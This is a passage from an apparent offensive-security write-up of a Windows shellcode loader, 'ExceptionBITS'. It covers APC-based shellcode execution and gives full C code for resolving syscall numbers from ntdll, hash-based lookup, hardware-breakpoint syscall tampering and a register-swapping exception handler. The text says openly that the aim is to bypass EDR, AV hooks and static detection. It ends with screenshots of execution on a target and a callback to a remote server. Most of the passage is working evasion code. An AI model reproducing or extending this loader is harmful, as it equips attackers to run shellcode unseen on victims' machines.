* `shellcode_executed = TRUE` and `main_processing = FALSE` update global state flags.
* `return EXCEPTION_CONTINUE_EXECUTION` tells Windows to resume execution. The CPU will return to the instruction after `pDummy()` in `main()`

The APC (Asynchronous Procedure Call) mechanism is a Windows kernel feature that allows one context to request that code be executed in another thread's context. APCs come in two types: user-mode and kernel-mode. This loader uses user-mode APCs, which only execute when the target thread enters an alertable wait state. The genius of this approach is that the shellcode runs in the context of the loader's own main thread, not a newly created thread. Thread creation is one of the most monitored events in process security; EDR and AV products track every `CreateThread`, `CreateRemoteThread`, and `NtCreateThreadEx` call. By using an APC on an existing thread, the loader avoids this telemetry completely. The shellcode appears to execute spontaneously during a `SleepEx` call, which looks like a normal thread waiting for I/O. The NULL parameters to `ZwQueueApcThread` are placeholders i.e the function signature allows passing arguments to the APC routine, but shellcode typically doesn't expect arguments (it's position-independent and self-contained). The fact that `EXCEPTION_CONTINUE_EXECUTION` returns execution to `main()` shows the exception was handled successfully, the breakpoint is cleared, and life continues normally. If this returned `EXCEPTION_CONTINUE_SEARCH`, Windows would look for other exception handlers, potentially triggering termination if no handler claims the exception.

</details>

<details>

<summary>Syscall Tampering</summary>

#### **4.1 SSN Discovery Through Export Table Parsing**

{% code overflow="wrap" %}

```c
BOOL PopulateSyscallList() {
    if (gEntriesList.dwEntriesCount) {
        printf("[DEBUG] Syscall list already populated with %d entries\n", gEntriesList.dwEntriesCount);
        return TRUE;
    }
    
    printf("[DEBUG] Populating syscall list...\n");
    
    // Get handle to ntdll.dll
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) {
        printf("[!] Failed to get ntdll.dll handle\n");
        return FALSE;
    }
    
    printf("[DEBUG] Found ntdll.dll at 0x%p\n", hNtdll);
    
    ULONG_PTR uNtdllBase = (ULONG_PTR)hNtdll;
    
    // Parse PE header
    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)uNtdllBase;
    PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(uNtdllBase + pDosHeader->e_lfanew);
    
    if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE) {
        printf("[!] Invalid PE signature\n");
        return FALSE;
    }
    
    // Get export directory
    PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(
        uNtdllBase + pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    
    if (!pExportDirectory) {
        printf("[!] Failed to get export directory\n");
        return FALSE;
    }
    
    PDWORD pdwFunctionNameArray = (PDWORD)(uNtdllBase + pExportDirectory->AddressOfNames);
    PDWORD pdwFunctionAddressArray = (PDWORD)(uNtdllBase + pExportDirectory->AddressOfFunctions);
    PWORD pwFunctionOrdinalArray = (PWORD)(uNtdllBase + pExportDirectory->AddressOfNameOrdinals);
    
    printf("[DEBUG] Export directory has %d functions\n", pExportDirectory->NumberOfNames);
    
    // Store Zw* syscalls
    for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++) {
        PCHAR pFunctionName = (PCHAR)(uNtdllBase + pdwFunctionNameArray[i]);
        
        // Check if function name starts with "Zw"
        if (*(unsigned short*)pFunctionName == 'wZ') {
            if (gEntriesList.dwEntriesCount < MAX_ENTRIES) {
                gEntriesList.Entries[gEntriesList.dwEntriesCount].u32Hash = HASH_STR(pFunctionName);
                gEntriesList.Entries[gEntriesList.dwEntriesCount].uAddress = 
                    (ULONG_PTR)(uNtdllBase + pdwFunctionAddressArray[pwFunctionOrdinalArray[i]]);
                gEntriesList.dwEntriesCount++;
            }
        }
    }
    
    printf("[DEBUG] Found %d Zw* functions before sorting\n", gEntriesList.dwEntriesCount);
    
    if (gEntriesList.dwEntriesCount == 0) {
        printf("[!] No Zw* functions found\n");
        return FALSE;
    }
    
    // Sort by address (bubble sort)
    for (DWORD i = 0; i < gEntriesList.dwEntriesCount - 1; i++) {
        for (DWORD j = 0; j < gEntriesList.dwEntriesCount - i - 1; j++) {
            if (gEntriesList.Entries[j].uAddress > gEntriesList.Entries[j + 1].uAddress) {
                SYSCALL_ENTRY TempEntry = {
                    .u32Hash = gEntriesList.Entries[j].u32Hash,
                    .uAddress = gEntriesList.Entries[j].uAddress
                };
                gEntriesList.Entries[j].u32Hash = gEntriesList.Entries[j + 1].u32Hash;
                gEntriesList.Entries[j].uAddress = gEntriesList.Entries[j + 1].uAddress;
                gEntriesList.Entries[j + 1].u32Hash = TempEntry.u32Hash;
                gEntriesList.Entries[j + 1].uAddress = TempEntry.uAddress;
            }
        }
    }
    
    printf("[DEBUG] Syscall list sorted successfully with %d entries\n", gEntriesList.dwEntriesCount);
    return TRUE;
}
```

{% endcode %}

* `GetModuleHandleA("ntdll.dll")` retrieves the base address of ntdll.dll, which is already loaded in every Windows process. This returns the HMODULE, which is actually the base address where the DLL is mapped.
* `PIMAGE_DOS_HEADER pDosHeader` points to the DOS header, which starts with the signature "MZ" (0x5A4D). Every PE file begins with this legacy DOS header.
* `pDosHeader->e_lfanew` is an offset to the PE header (IMAGE\_NT\_HEADERS). In ntdll.dll, this is typically 0xF0.
* `pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE` verifies the PE signature is "PE\0\0" (0x00004550).
* `DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]` accesses the export directory entry (index 0) in the data directory array. This contains the RVA and size of the export table.
* `PIMAGE_EXPORT_DIRECTORY` points to a structure containing three important arrays: AddressOfNames (RVAs of function name strings), AddressOfFunctions (RVAs of function code), and AddressOfNameOrdinals (indices mapping names to addresses).
* `*(unsigned short*)pFunctionName == 'wZ'` checks if the first two characters are 'Z' and 'w' by treating them as a 16-bit integer. In little-endian (which x86/x64 uses), this reads as 'w' in the low byte and 'Z' in the high byte, forming the value 0x775A ("wZ").
* `HASH_STR(pFunctionName)` computes the CRC32 hash of the function name.
* `uNtdllBase + pdwFunctionAddressArray[pwFunctionOrdinalArray[i]]` calculates the absolute address of the function. The ordinal array provides an index into the address array, and adding the base address converts the RVA to a virtual address.
* The bubble sort orders functions by address. This is intentional because in Windows, the SSN of a function corresponds to its position when syscalls are sorted by address.

This PE parsing manually walks ntdll's export table to enumerate all syscalls. Windows ntdll.dll exports two parallel sets of syscall wrappers: `Nt*` and `Zw*` functions. Both ultimately invoke the same kernel-mode functions, but they have different behaviors in kernel mode (not relevant here). ExceptionBITS chooses `Zw*` functions, which may be less commonly hooked. Microsoft assigns SSNs sequentially based on alphabetical/address order. For example, in Windows 10 21H2 x64, if you sort all Zw functions by address, `ZwAcceptConnectPort` gets SSN 0, `ZwAccessCheck` gets SSN 1, and so on. This ordering is consistent within a Windows build but changes between versions (e.g., Windows 10 vs. Windows 11). By dynamically discovering this ordering at runtime, ExceptionBITS adapts to any Windows version without hardcoded SSNs. The limitation is that this technique only works for `Zw*` functions exported from ntdll; if a syscall isn't exported or is obfuscated, this won't find it. The bubble sort is inefficient (O(n²)), but with only \~400-500 Zw functions in ntdll, it completes in milliseconds. The use of RVAs (Relative Virtual Addresses) in PE files is important as they're offsets from the base address, allowing the same DLL to load at different addresses due to ASLR without breaking references.

#### **4.2 Fetching the System Service Number (SSN) by Hash**

```c
DWORD FetchSSNFromSyscallEntries(IN UINT32 uCRC32FunctionHash) {
    if (!PopulateSyscallList()) {
        printf("[!] Failed to populate syscall list\n");
        return 0x00;
    }
    for (DWORD i = 0; i < gEntriesList.dwEntriesCount; i++) {
        if (uCRC32FunctionHash == gEntriesList.Entries[i].u32Hash) {
            return i;
        }
    }
    printf("[!] SSN not found for hash 0x%0.8X\n", uCRC32FunctionHash);
    return 0x00;
}
```

This function is the bridge between the hash-based identification of syscalls and their actual SSN, which is required for the kernel to execute the correct system call. By using hashes, the loader avoids storing or referencing sensitive function names directly, making static analysis and signature-based detection much harder. The dynamic resolution of SSNs means the loader is robust across Windows versions, as SSNs can change between builds.

#### **4.3 Preparing the Tampered Syscall Hijack**

{% code overflow="wrap" %}

```c
BOOL InitializeTamperedSyscall(IN ULONG_PTR uCalledSyscallAddress, IN UINT32 uCRC32FunctionHash,
                               IN ULONG_PTR uParm1, IN ULONG_PTR uParm2, IN ULONG_PTR uParm3, IN ULONG_PTR uParm4) {
    // Find the syscall instruction (0x0F 0x05) in the decoy function
    PVOID pDecoySyscallInstructionAdd = NULL;
    for (int i = 0; i < 0x20; i++) {
        unsigned short opcode = *(unsigned short*)(uCalledSyscallAddress + i);
        if (opcode == 0x050F) { // 'syscall' opcode
            pDecoySyscallInstructionAdd = (PVOID)(uCalledSyscallAddress + i);
            break;
        }
    }
    if (!pDecoySyscallInstructionAdd) {
        printf("[!] Could not find syscall instruction in decoy function\n");
        return FALSE;
    }
    DWORD dwRealSyscallNumber = FetchSSNFromSyscallEntries(uCRC32FunctionHash);
    if (dwRealSyscallNumber == 0x00) {
        printf("[!] FetchSSNFromSyscallEntries returned 0 for hash 0x%0.8X\n", uCRC32FunctionHash);
        return FALSE;
    }
    PassParameters(uParm1, uParm2, uParm3, uParm4, dwRealSyscallNumber);
    if (!InstallHardwareBPHook(GetCurrentThreadId(), (ULONG_PTR)pDecoySyscallInstructionAdd)) {
        printf("[!] Failed to install hardware breakpoint\n");
        return FALSE;
    }
    return TRUE;
}
```

{% endcode %}

This function is the heart of the tampering mechanism. By setting a hardware breakpoint on the `syscall` instruction of a benign function (the decoy), the loader ensures that when the decoy is called, execution will be intercepted just before the transition to kernel mode. This allows the loader to swap out the decoy's SSN and parameters for those of the real, sensitive syscall. The use of hardware breakpoints (rather than software breakpoints) makes this invisible to most user-mode monitoring tools and avoids modifying code in memory, which is a common detection vector.

#### **4.4 Passing Parameters for the Tampered Syscall**

{% code overflow="wrap" %}

```c
VOID PassParameters(IN ULONG_PTR uParm1, IN ULONG_PTR uParm2, IN ULONG_PTR uParm3, IN ULONG_PTR uParm4, IN DWORD dwSyscallNmbr) {
    EnterCriticalSection(&g_CriticalSection);
    g_TamperedSyscall.uParm1 = uParm1;
    g_TamperedSyscall.uParm2 = uParm2;
    g_TamperedSyscall.uParm3 = uParm3;
    g_TamperedSyscall.uParm4 = uParm4;
    g_TamperedSyscall.dwSyscallNmbr = dwSyscallNmbr;
    LeaveCriticalSection(&g_CriticalSection);
}
```

{% endcode %}

The use of a critical section ensures that only one thread can modify the tampered syscall parameters at a time, preventing corruption or unexpected behavior. This is especially important in complex loaders that may operate in multi-threaded contexts or be injected into multi-threaded processes.

#### **4.5 Installing the Hardware Breakpoint**

{% code overflow="wrap" %}

```c
BOOL InstallHardwareBPHook(IN DWORD dwThreadID, IN ULONG_PTR uTargetFuncAddress) {
    CONTEXT Context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
    HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, dwThreadID);
    if (!hThread) return FALSE;
    if (!GetThreadContext(hThread, &Context)) {
        CloseHandle(hThread);
        return FALSE;
    }
    Context.Dr0 = uTargetFuncAddress;
    Context.Dr6 = 0x00;
    Context.Dr7 = SetDr7Bits(Context.Dr7, 0x10, 0x02, 0x00); // RW0 = 00 (execute)
    Context.Dr7 = SetDr7Bits(Context.Dr7, 0x12, 0x02, 0x00); // LEN0 = 00 (1 byte)
    Context.Dr7 = SetDr7Bits(Context.Dr7, 0x00, 0x01, 0x01); // L0 = 1 (enable)
    if (!SetThreadContext(hThread, &Context)) {
        CloseHandle(hThread);
        return FALSE;
    }
    CloseHandle(hThread);
    return TRUE;
}
```

{% endcode %}

By setting RW0 to `00` (execute) and LEN0 to `00` (1 byte), the loader ensures the breakpoint only triggers on instruction execution at the exact address. Setting L0 to `1` enables the breakpoint for the current thread only, making it invisible to other threads and harder to detect.

#### **4.6 Exception Handler for Tampered Syscall Execution**

{% code overflow="wrap" %}

```c
LONG ExceptionHandlerCallbackRoutine(IN PEXCEPTION_POINTERS pExceptionInfo) {
    BOOL bResolved = FALSE;
    if (pExceptionInfo->ExceptionRecord->ExceptionCode != STATUS_SINGLE_STEP)
        goto _EXIT_ROUTINE;
    if (pExceptionInfo->ExceptionRecord->ExceptionAddress != (PVOID)pExceptionInfo->ContextRecord->Dr0)
        goto _EXIT_ROUTINE;
    EnterCriticalSection(&g_CriticalSection);
    // Replace Decoy SSN and parameters with the real ones
    pExceptionInfo->ContextRecord->Rax = (DWORD64)g_TamperedSyscall.dwSyscallNmbr;
    pExceptionInfo->ContextRecord->R10 = (DWORD64)g_TamperedSyscall.uParm1;
    pExceptionInfo->ContextRecord->Rdx = (DWORD64)g_TamperedSyscall.uParm2;
    pExceptionInfo->ContextRecord->R8 = (DWORD64)g_TamperedSyscall.uParm3;
    pExceptionInfo->ContextRecord->R9 = (DWORD64)g_TamperedSyscall.uParm4;
    // Remove breakpoint
    pExceptionInfo->ContextRecord->Dr0 = 0ull;
    LeaveCriticalSection(&g_CriticalSection);
    bResolved = TRUE;
_EXIT_ROUTINE:
    return (bResolved ? EXCEPTION_CONTINUE_EXECUTION : EXCEPTION_CONTINUE_SEARCH);
}
```

{% endcode %}

The exception handler directly manipulates the CPU's register state, swapping out the decoy values for the real ones just before the `syscall` instruction executes. This means the kernel receives the real syscall and parameters, even though the user-mode code called a benign function. This bypasses user-mode hooks, IAT/EAT patching, and most EDR monitoring, as the actual syscall transition is never made through the monitored API.&#x20;

</details>

***

## Results And Screenshots

#### Execution On Target System

<figure><img src="https://2429440930-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fvmiq90eCUf7ZZMUGm7Qu%2Fuploads%2FRcNn6HWVHSRg636nETDx%2FExecution%201.png?alt=media&#x26;token=9a3d674d-67a5-4e3a-a4e2-70d29ddafd04" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2429440930-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fvmiq90eCUf7ZZMUGm7Qu%2Fuploads%2FOfKH2RC5GWzrxUUUo571%2FExecution%202.png?alt=media&#x26;token=5f892c7d-348c-478d-906c-68e4673b41c4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2429440930-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fvmiq90eCUf7ZZMUGm7Qu%2Fuploads%2FbW2Srd3uaiVp1OjyHGsL%2FExecution%203.png?alt=media&#x26;token=b33913c5-d495-466d-9b66-1ba57278eec9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2429440930-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fvmiq90eCUf7ZZMUGm7Qu%2Fuploads%2FEerq91ei49Ybgo5sPlFW%2FExecution%204.png?alt=media&#x26;token=f081c9c4-d3b4-42a4-a7af-70b0a69f0605" alt=""><figcaption></figcaption></figure>

#### Callback To Remote Server

<figure><img src="https://2429440930-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fvmiq90eCUf7ZZMUGm7Qu%2Fuploads%2F1sOtf80Ux7cGe9Gfpv1r%2FServer%20Callback.png?alt=media&#x26;token=2d069c55-1c29-415c-9b90-89b7474df5a5" alt=""><figcaption></figcaption></figure>
